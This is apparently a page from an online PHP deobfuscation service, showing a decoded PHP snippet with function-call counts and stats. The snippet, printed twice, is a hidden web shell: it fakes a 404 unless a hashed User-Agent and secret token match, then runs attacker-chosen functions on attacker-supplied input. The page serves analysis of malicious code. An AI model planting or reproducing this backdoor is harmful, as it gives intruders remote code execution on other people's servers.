Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if (md5(md5(md5($_SERVER['HTTP_USER_AGENT']))) != '4f7f3da06809dc3d94dacceed4..
Decoded Output download
<?php
if (md5(md5(md5($_SERVER['HTTP_USER_AGENT']))) != '4f7f3da06809dc3d94dacceed40dfaad') {
header('HTTP/1.1 404 Not Found');
header("status: 404 Not Found");
die();
}
if($_REQUEST["token"] == "2b4f922603f552eb39f80badec0a5339"){
if ($li7ieq = @$_REQUEST['index']){
$li7ieq[1]($li7ieq[2], $li7ieq[3]($li7ieq[4]));exit;
}
} ?>
Did this file decode correctly?
Original Code
<?php
if (md5(md5(md5($_SERVER['HTTP_USER_AGENT']))) != '4f7f3da06809dc3d94dacceed40dfaad') {
header('HTTP/1.1 404 Not Found');
header("status: 404 Not Found");
die();
}
if($_REQUEST["token"] == "2b4f922603f552eb39f80badec0a5339"){
if ($li7ieq = @$_REQUEST['index']){
$li7ieq[1]($li7ieq[2], $li7ieq[3]($li7ieq[4]));exit;
}
}
Function Calls
md5 | 3 |
header | 1 |
Stats
MD5 | d9f124f2a30808a899258d1c8156c5d3 |
Eval Count | 0 |
Decode Time | 45 ms |